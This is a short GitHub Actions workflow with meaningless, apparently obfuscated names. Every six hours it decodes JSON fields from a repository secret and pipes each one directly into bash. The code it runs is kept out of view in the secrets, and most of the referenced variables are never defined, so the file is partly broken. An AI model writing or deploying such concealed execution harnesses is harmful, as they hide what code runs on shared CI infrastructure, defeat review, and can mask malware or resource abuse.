name: fangzhangdx

on:
  workflow_dispatch:
  schedule:
    - cron: '5 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fangzhangdx
        env:
          tleus847: ${{ secrets.tleus847 }}
        run: |
          echo $tleus847 | jq -r .mc6 | /bin/bash
          echo $jo1 | jq -r .s377 | /bin/bash
          echo $ljqca9814 | jq -r .giyy874 | /bin/bash
          echo $gxly3114 | jq -r .bbi9 | /bin/bash
          echo $qmmw64 | jq -r .qek62158 | /bin/bash
          echo $dbo755 | jq -r .fomb1 | /bin/bash
          echo $xq8027 | jq -r .f2988 | /bin/bash
          echo $rcwv7622 | jq -r .qxj03 | /bin/bash

